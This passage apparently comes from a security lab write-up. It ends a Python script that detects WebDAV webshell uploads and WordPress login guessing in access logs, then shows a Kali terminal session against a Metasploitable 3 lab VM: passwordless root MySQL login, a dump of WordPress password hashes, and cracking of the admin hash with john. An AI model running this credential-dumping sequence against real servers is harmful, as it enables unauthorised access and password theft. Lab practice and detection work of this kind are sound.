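            rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
            yield rec


def find_webdav_webshells(lines):
    """Map each executable file created by a successful (2xx) WebDAV write to
    the IP that wrote it and the set of IPs that later requested it."""
    findings = {}
    for rec in parse(lines):
        if (rec["method"] in WRITE_METHODS and rec["path"].lower().endswith(EXEC_EXT)
                and 200 <= rec["status"] < 300):
            findings[rec["path"]] = {"uploader": rec["ip"], "executed_by": set()}
        elif rec["path"] in findings and rec["method"] in ("GET", "POST"):
            findings[rec["path"]]["executed_by"].add(rec["ip"])
    return findings


def find_login_bruteforce(lines, threshold=10):
    """Count wp-login.php POSTs answered with 200 (failed login) per source IP and
    report sources at or above the threshold, noting whether a 302 (successful
    login) followed the failures, which is what a guessed password looks like."""
    failures = defaultdict(int)
    success_after = defaultdict(bool)
    for rec in parse(lines):
        if rec["method"] != "POST" or not rec["path"].endswith("/wp-login.php"):
            continue
        if rec["status"] == 200:
            failures[rec["ip"]] += 1
        elif rec["status"] == 302 and failures[rec["ip"]] >= threshold:
            success_after[rec["ip"]] = True
    return {ip: {"failures": n, "success_after": success_after[ip]}
            for ip, n in failures.items() if n >= threshold}


if __name__ == "__main__":
    for path, info in find_webdav_webshells(SAMPLE_LOG).items():
        print(f"[!] {path} written by {info['uploader']}, requested by {sorted(info['executed_by'])}")
    for ip, info in find_login_bruteforce(SAMPLE_LOG).items():
        print(f"[!] wp-login.php guessing from {ip}: {info}")
```

On a real server the same checks apply to the access log of the vhost serving /uploads and /wordpress; the PUT rule fires on the write itself, so the file is caught even before anyone requests it.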
Metasploitable 3 MySQL Vulnerability
root@kali:~# mysql -u root -h 192.168.119.108
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 216
Server version: 5.5.20-log MySQL Community Server (GPL)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| cards              |
| mysql              |
| performance_schema |
| test               |
| wordpress          |
+--------------------+
6 rows in set (0.005 sec)
MySQL [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [wordpress]> select user_login, user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 |
| vagrant    | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ |
| user       | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ |
| manager    | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 |
+------------+------------------------------------+
4 rows in set (0.001 sec)
MySQL [wordpress]>
root@kali:~# nano wordpresshash.txt
root@kali:~# john wordpresshash.txt --show
admin:sploit
1 password hashes cracked, 0 left